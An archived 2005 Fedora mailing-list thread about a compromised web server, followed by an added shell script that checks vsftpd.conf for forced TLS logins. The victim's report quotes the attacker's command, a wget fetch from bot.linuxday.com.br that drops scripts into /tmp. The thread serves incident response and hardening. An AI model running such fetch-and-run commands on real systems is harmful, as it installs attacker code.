Server compromised

dan info at hostinthebox.net
Sat Feb 19 00:24:54 UTC 2005


paul at topguncomputers.com wrote:
>>On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
>><paul at topguncomputers.com> wrote:
>>
>>>Apparently someone has hacked into my webserver.  And is installing perl
>>>scripts into the /tmp/ directory.  They're usually named .linuxday* or
>>>.cinta* and a few other names as well.
>>>
>>>From what I can tell something is causing apache to run a command like
>>>"sh
>>>wget  bot.linuxday.com.br -O {the above mentioned files are then
>>>listed}"
>>>
>>>sometimes the site is worm.linuxday.com.br
>>>
>>>I'm curious if anyone has heard about this before.  I'm currently
>>>running
>>>Fedora 1 with all the latest security patches.
>>
>>The only way to ensure your system is clean, and likely to remain clean,
>>is to:
>>
>>1. Do a bare metal install
>>2. Change all passwords to new strong passwords
>>3. Disable cleartext services, ftp, telnet, rsh, etc.
>>4. Disable root remote login (use su or sudo)
>>5. Restore your uncompromised data
>>6. etc.
>>I had to do this for a client and the next 3 days the intruder tried
>>to get back in.
>>
>>--
>>Leonard Isham, CISSP
>>Ostendo non ostento.
>>
>>--
>>fedora-list mailing list
>>fedora-list at redhat.com
>>To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
>>
> 
> 
> In place of FTP, what would you suggest? That is the only cleartext
> password service I allow. So what else can I use in place of that?
> 
> And shell access is denied for all accounts, except for 2.
> 
> I get the feeling this came in on awstats, although I'm not 100% positive,
> and I'm wanting to find out how it got in first before I just delete and
> restart over again.
> 

That AWStats hit me a couple times, which sucked.  I had all kinds of 
cool movies put on the server by whoever popped it.

But in all seriousness, vsftpd supports TLS/SSL connections, so you can 
avoid cleartext passwords altogether.  It's working quite nicely for me.

Hope that helps
-dant
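As an added example (not from this thread, and not the vsftpd project's own code): a small shell check that audits a vsftpd.conf for the settings that actually force the TLS logins dant refers to, since `ssl_enable=YES` alone still lets clients log in in cleartext. The option names are real vsftpd options; the two config files it tests are constructed samples written to temp files.

```shell
# Added example, not from the thread: audit a vsftpd.conf for the settings that
# keep FTP logins off the wire in cleartext. Option names are real vsftpd
# options; the two sample configs below are constructed for illustration.

# Return 0 if the config forces TLS for local logins and data, 1 otherwise.
# Usage: vsftpd_tls_ok /etc/vsftpd/vsftpd.conf
vsftpd_tls_ok() {
    conf="$1"
    for opt in ssl_enable force_local_logins_ssl force_local_data_ssl; do
        # Take the last uncommented assignment; vsftpd values are case-insensitive.
        val=$(grep -E "^[[:space:]]*${opt}=" "$conf" | tail -n 1 | cut -d= -f2 | tr '[:lower:]' '[:upper:]' | tr -d '[:space:]')
        if [ "$val" != "YES" ]; then
            echo "$conf: $opt is '${val:-unset}', cleartext credentials still possible" >&2
            return 1
        fi
    done
    return 0
}

# Constructed sample: the weak default, which accepts passwords in cleartext.
WEAK_CONF=$(mktemp)
cat >"$WEAK_CONF" <<'EOF'
listen=YES
local_enable=YES
write_enable=YES
ssl_enable=NO
EOF

# Constructed sample: the hardened form, TLS required for logins and data.
TLS_CONF=$(mktemp)
cat >"$TLS_CONF" <<'EOF'
listen=YES
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
rsa_cert_file=/etc/vsftpd/vsftpd.pem
EOF
trap 'rm -f "$WEAK_CONF" "$TLS_CONF"' EXIT

vsftpd_tls_ok "$WEAK_CONF" || echo "weak config rejected"
vsftpd_tls_ok "$TLS_CONF" && echo "TLS-only config accepted"
```

Point it at the live /etc/vsftpd/vsftpd.conf to confirm the running daemon refuses cleartext logins rather than merely offering TLS.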
